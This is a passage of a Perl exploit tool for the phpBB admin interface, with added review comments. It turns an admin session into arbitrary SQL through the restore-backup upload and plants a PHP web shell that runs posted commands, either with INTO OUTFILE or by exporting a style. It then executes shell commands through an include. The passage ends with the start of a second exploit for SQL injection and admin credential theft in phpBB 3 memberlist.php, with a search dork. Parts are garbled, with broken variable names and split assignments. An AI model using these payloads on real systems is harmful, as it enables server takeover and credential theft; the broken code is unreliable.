
works regardless of php.ini settings.


# Sub-command 'clear': remove the theme rows with an empty style_name and
# template_name that the 'create' paths leave behind in `<prefix>themes`.
# $cmd, $prefix, $path, $sid, $dir, $filename and $method are package globals
# populated by the option parsing that precedes this listing (not visible here).
# Everything in this tool runs against the phpBB *admin* interface with an
# admin session id (-s in usage()), i.e. it is post-authentication: an admin
# session is turned into arbitrary SQL and then into OS command execution.
if($cmd eq 'clear')

{

&show_header;

# NOTE(review): the " -\n" separators look truncated by the document
# extraction (the original most likely printed a dashed rule); left as-is.
print " -\n"; print "[~] Clearing database ";

# Raw SQL, executed via the admin "restore backup" upload in
# phpbb_sql_query(). The table prefix is interpolated verbatim.
$sql = 'DELETE FROM `'.$prefix.'themes` WHERE style_name="" AND

template_name="";';

# phpbb_sql_query() returns 0 on failure, 1 on "successfully restored",
# 2 on "already exists".
$suc = &phpbb_sql_query("${path}admin_db_utilities.php?sid=$sid",$sql); if(!$suc) { print " [ FAILED ]\n"; exit(); }

if($suc == 1) { print " [ DONE ]\n"; }

print " -\n"; exit();

}

# Sub-command 'create', method 1: have MySQL itself write a PHP file into
# $dir.$filename with SELECT ... INTO OUTFILE.  The written file contains
# `<? passthru($_POST[jagajaga]); ?>`, so any later POST with a 'jagajaga'
# field runs that value as a shell command once the file is included.
# Caveats not checked here: the DB account must be allowed to write files
# (MySQL FILE privilege), MySQL must run on the same host as the web root,
# and $dir must be writable by MySQL and reachable by the later include.
if($cmd eq 'create' && $method == 1)

{

&show_header;

print " -\n"; print "[!] Method 1 - use \"INTO OUTFILE\"\n";

print "[!] Create file for including.\n";

print "[~] Try to run sql query in database ";

# `FROM <prefix>users LIMIT 1` only exists to produce exactly one row;
# the selected literal is the entire file content.  $dir and $filename
# are placed into a single-quoted SQL string without escaping.
$sql = 'SELECT \'<? passthru($_POST[jagajaga]); ?>\' FROM '.$prefix.'users LIMIT 1 INTO OUTFILE \''.$dir.$filename.'\';';

$suc = &phpbb_sql_query("${path}admin_db_utilities.php?sid=$sid",$sql); if(!$suc) { print " [ FAILED ]\n"; exit(); }

# Return code 2 means the restore page reported "already exists": INTO
# OUTFILE refuses to overwrite, so an earlier run already created the file.
if($suc == 2) { print " [ DONE ]\n[!] File already exists! Now you can try execute command!\n"; }

if($suc == 1) { print " [ DONE ]\n[+] File successfully created! Now you can try execute command!\n"; }

print " -\n"; exit();

}

# Sub-command 'get_prefix': recover the table prefix by downloading a
# structure-only database backup from the admin interface and scanning it for
# the `TABLE: <prefix>auth_access` line that phpBB emits in the dump.
if($cmd eq 'get_prefix')

{

&show_header;

print " -\n"; print "[~] Try to get prefix ";

# $xpl is the HTTP client object created outside this listing (its ->get /
# ->post return objects with ->is_success and ->content; presumably
# LWP::UserAgent, not confirmed here).
$res = $xpl->get(

# NOTE(review): `backup_ty pe` and `$s id` on the next line are line-wrap
# artefacts of this listing; every other request in the tool uses `sid=$sid`,
# and the parameter is `backup_type`.  Not repaired here to keep the listing
# byte-identical — fix it before running.
"${path}admin_db_utilities.php?perform=backup&additional_tables=&backup_ty pe=structure&drop=0&backupstart=1&gzipcompress=0&startdownload=1&sid=$s id"

);

# `.*` is greedy and does not cross newlines, so $2 is whatever sits between
# "TABLE: " and "auth_access" on the first matching line.
if($res->is_success && $res->content =~ /(TABLE: )(.*)(auth_access)/)

{

# An empty capture (prefix-less install) is reported as the literal text
# "No prefix"; this branch only prints it and exits, so the placeholder never
# reaches a SQL statement.
$prefix = ($2)?($2):("No prefix");

print "[ DONE ]\nPREFIX : $prefix\n";

}

else { print "[ FAILED ]\n"; }

print " -\n"; exit(0);

}

# Sub-command 'create', method 2 (the default per usage()): create the PHP
# file through phpBB's own admin "create style" / "export style" features
# instead of MySQL INTO OUTFILE, so no FILE privilege is needed.
# Sequence: (1) widen `template_name` so the payload fits, (2) create a style
# named '0wn' whose template_name is PHP code, (3) export that "template",
# which (per the success message below) writes the file under $dir,
# (4) delete the '0wn' row again.
# Detection note: a style named '0wn', or a template_name containing
# `passthru($_POST[`, in the `<prefix>themes` table is the footprint this
# leaves behind if step (4) does not run.
if($cmd eq 'create' && $method == 2)

{

&show_header;

print " -\n"; print "[!] Method 2 - use \"create\\export style\"\n";

print "[~] Try to run sql query in database ";

# Schema change via the restore-upload SQL channel; presumably needed
# because the stock column is shorter than the payload (not verified here).
$sql = 'ALTER TABLE `'.$prefix.'themes` CHANGE `template_name`

`template_name` VARCHAR( 255 ) NOT NULL;';

$suc = &phpbb_sql_query("${path}admin_db_utilities.php?sid=$sid",$sql); if(!$suc) { print " [ FAILED ]\n"; exit(); }

if($suc == 1) { print " [ DONE ]\n"; }

print "[~] Creating new style ";

# Note this overwrites the package global $res that phpbb_sql_query() also
# assigns; harmless here because it is reassigned before use.
$res = $xpl->post(

"${path}admin_styles.php?sid=$sid",

[

'style_name' => '0wn',

# The payload doubles as a PHP statement list: `a=12;` is filler, the
# passthru() runs the posted 'jagajaga' value, `exit(0);//` stops the
# rest of the line (including the appended $dir) from being parsed.
'template_name' => 'a=12;passthru($_POST[jagajaga]);exit(0);//'.$dir,

'mode' => 'create',

'submit' => 'Save Settings'

],

);

# Only the HTTP status is checked; a phpBB-level error page with status 200
# would be reported as success.
if($res->is_success){ print " [ DONE ]\n[~] Creating file "; }

else { print " [ FAILED ]\n"; exit(0); }

$res = $xpl->post(

"${path}admin_styles.php?sid=$sid",

[

# Same payload as the style's template_name, so the export step operates on
# the row just created.  Exactly which file name phpBB derives from this is
# not visible in this listing.
'export_template' => 'a=12;passthru($_POST[jagajaga]);exit(0);//'.$dir,

'mode' => 'export',

'edit' => 'Submit'

],

);

if($res->is_success) { print " [ DONE ]\n[+] File successfully created! Now you can try execute command!\n"; }

else { print " [ FAILED ]\n"; exit(0); }

print "[~] Delete style from database ";

# Cleanup of the '0wn' row; the return value is ignored, so "[ DONE ]" is
# printed even when the delete did not go through.
$sql = 'DELETE FROM `'.$prefix.'themes` WHERE style_name="0wn";'; &phpbb_sql_query("${path}admin_db_utilities.php?sid=$sid",$sql);

print " [ DONE ]\n";

print " -\n"; exit(0);

}

# Default path (any -c value other than clear/create/get_prefix): run $cmd
# through the file created earlier.  The command is wrapped between two
# `echo _GHC/RST_` markers so the command output can be cut out of the
# surrounding HTML with the split() below; $cmdspl is the shell separator
# chosen outside this listing.
#
# NOTE(review): as listed these are five independent assignments, so only the
# last one survives and neither $cmdspl nor $cmd would ever be sent.  Given the
# markers on both ends and the split() below, this is almost certainly a single
# concatenation (`'echo _GHC/RST_ '.$cmdspl.$cmd.$cmdspl.' echo _GHC/RST_'`)
# broken apart by the document extraction — verify against the original file
# rather than trusting the listing.
$jagajaga = 'echo _GHC/RST_ ';

$jagajaga = $cmdspl;

$jagajaga = $cmd;

$jagajaga = $cmdspl;

$jagajaga = ' echo _GHC/RST_';

# The include trigger: admin_styles.php in mode=addnew takes `install_to`
# from the query string and includes from that directory, so pointing it at
# $dir loads the planted file, whose passthru($_POST[jagajaga]) runs the
# posted value.  Detection note: `admin_styles.php?mode=addnew` together with
# an `install_to=` parameter and a POST body is the request shape to look for.
$res = $xpl->post(

"${path}admin_styles.php?mode=addnew&sid=${sid}&install_to=${dir}", [

'jagajaga' => "$jagajaga"

]

);

&show_header;

# Unlike the other paths there is no ->is_success check before reading
# ->content.  "main(): Failed opening" is PHP's include() failure text.
if($res->content =~ /main\(\): Failed opening/) { print "[-] Error!\nFailed include file! Maybe you forgot create shell file first?\n"; exit(); }

# Element [1] is whatever lies between the two marker echoes, i.e. the
# command's own output.
@rez = split("_GHC/RST_",$res->content);

# `@rez[1]` is a one-element array slice; `$rez[1]` is the intended scalar
# (same output here, but `use warnings` would flag it).
print " -\n"; print @rez[1];

print " -\n";

# Print the option summary and exit.  Documents the tool's preconditions:
# an admin session id (-s) is mandatory, the prefix (-P) and file-creation
# method (-m) are optional with defaults "phpbb_" and 2, and -c defaults to
# "create".  The empty `()` prototype is cosmetic here since the sub is only
# ever called with no arguments.
sub usage(){

# NOTE(review): " -\n" separators appear truncated by extraction (see the
# other print calls in this file).
print " -\n"; print " phpBB admin_styles.php command execution exploit by 1dt.w0lf\n"; print " -\n"; print "Usage: $0 [options]\n";

print "\nOptions:\n\n";

print " -p path to phpBB admin interface e.g http://site.com/phpBB/admin/\n\n"; print " -s admin sid yeeesss you need admin rights for use this exploit =)\n\n"; print " -P database prefix (optional) default \"phpbb_\"\n\n";

print " -c [create|clear|get_prefix|(any unix/win command)]\n\n";

print " \"create\" for first create shell *default\n";

print " \"clear\" for delete our NULL styles from database\n";

print " \"get_prefix\" get table prefix\n";

print " \"any unix or win commands\" for commands execute =)\n\n";

print " -m method [1|2] (optional) default \"2\"\n\n";

print " 1 - use mysql function \"INTO OUTFILE\" for creating new file\n"; print " 2 - use phpBB functions \"create style\" and \"export style\" for create new file\n";

print " -\n"; print " RST/GHC private stuff , http://rst.void.ru , http://ghc.ru\n";

exit();

}

# Print the banner that precedes every sub-command's output.
# NOTE(review): the string literal below spans two lines in this listing
# ("... by" / "RST/GHC"), which is a line-wrap artefact of the extraction;
# the original was presumably a single line.  Left byte-identical.
sub show_header()

{

print " -\n"; print " phpBB admin_styles.php command execution exploit by

RST/GHC\n";

print " -\n"; }

# Execute an arbitrary SQL statement through phpBB's admin "Restore Database"
# feature: the statement is uploaded as if it were a backup file, and the
# restore handler runs it.  This is the SQL channel behind 'clear' and both
# 'create' methods.
#
# Arguments (positional, via @_):
#   $_[0]  full URL of admin_db_utilities.php including the admin sid
#   $_[1]  the SQL text to run
# Returns: 2 if the response says "already exists", 1 if it says
#   "The Database has been successfully restored", 0 otherwise (including
#   any non-success HTTP status).
#
# Notes:
#  - The `($$)` prototype affects how calls are parsed, not argument checking;
#    all callers use `&phpbb_sql_query(...)`, which bypasses it anyway.
#  - `$res` is not declared with `my`, so this clobbers the package-global
#    $res used by the top-level code.
#  - $xpl is the HTTP client created outside this listing.
#  - Detection note: a multipart POST to admin_db_utilities.php with
#    perform=restore and a text/plain upload named '0wneeeeedddd' is the
#    distinctive artefact of this tool in web-server logs.
sub phpbb_sql_query($$){

$res = $xpl->post("$_[0]",

Content_type => 'form-data',

Content => [

perform => 'restore',

restore_start => 'Start Restore',

# Multipart file part: no local file (undef), a fixed upload filename,
# and the SQL text as the file body.
backup_file => [

undef,

'0wneeeeedddd',

Content_type => 'text/plain',

Content => "$_[1]",

],

]

);

if ($res->is_success)

{

# "already exists" is surfaced by the INTO OUTFILE path when the target
# file is already present; treated as a distinct success code.
if ($res->content =~ /already exists/) { return 2; }

if ($res->content =~ /The Database has been successfully restored/) { return 1; } }

return 0;

}

black_hat_cr(HCE)

phpBB 3.x SQL injection via the memberlist.php 'ip' argument (requires global moderator rights; see the script header below)

#!/usr/bin/php -q -d short_open_tag=on

<?

echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure\n";

echo "by rgod rgod (at) autistici (dot) org [email concealed]\n";

echo "site: http://retrogod.altervista.org\n";

echo "dork, version specific: \"Powered by phpBB * 2002, 2006 phpBB

Group\"\n\n";

/*


works regardless of php.ini settings
